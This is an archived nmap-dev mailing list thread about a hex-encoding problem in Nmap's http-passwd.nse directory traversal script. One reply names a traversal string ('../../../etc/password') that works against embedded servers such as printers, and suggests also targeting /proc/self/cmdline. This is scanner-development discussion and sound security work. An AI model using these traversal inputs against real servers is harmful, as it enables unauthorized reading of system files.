mailing list archives
Re: hexify() problem in http-passwd.nse
From: Joao Correa <joao () livewire com br>
Date: Sun, 31 May 2009 17:49:17 -0300
Thanks a lot Brandon!
Your 30 seconds answer was loud and clear!
On Sun, May 31, 2009 at 5:11 PM, Brandon Enright <bmenrigh () ucsd edu> wrote:
-----BEGIN PGP SIGNED MESSAGE-----
On Sun, 31 May 2009 16:47:31 -0300 or thereabouts Joao Correa
<joao () livewire com br> wrote:
Kris, thanks for you answer and for the reference.
My doubt is if, with the http-passwd.nse script, you are trying to
retrieve the passwd file directly, or if it is used to retrieve the
file as a parameter for the web application, just like descripted in
Considering the source code I can only think about the first option,
but in this case we fall on the problem descripted on my first e-mail
(I´ve tried to reproduce the scenario here, but the hexed chars were
not decoded by the Apache, leading to failure). As mentioned before,
when I have removed the hexify function and sent the dir function
without special encoding, it worked fine. I don´t think it is the
Since the script dates from 2007 and the mentioned RFC dates from
2005, I don´t believe that it is a problem of lost compatibility due
to Apache getting fit to the RFC.
Have you used the script recently? Which web servers have you tried
Thanks a lot,
Hey João, sorry that I only have about 30 seconds to reply. The
directory transversal script really isn't targeted at mainstream
webserver like Apache and IIS. In some really heinous cases I suspect
it would work against either, but it works pretty well against all of
the hundreds of obscure webservers out there.
For example, the ../../../etc/password works against the embedded HTTP
server on many HTTP printers. Nevermind that it might violate RFC and
best practices, it works on lots of servers.
We might think of expanding the script beyond just /etc/password
though. I've seen a number attacks recently that check for directory
transversal by going after /proc/self/cmdline which seems to be more
reliable than things like /etc/password
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.11 (GNU/Linux)
-----END PGP SIGNATURE-----
Sent through the nmap-dev mailing list
Archived at http://SecLists.Org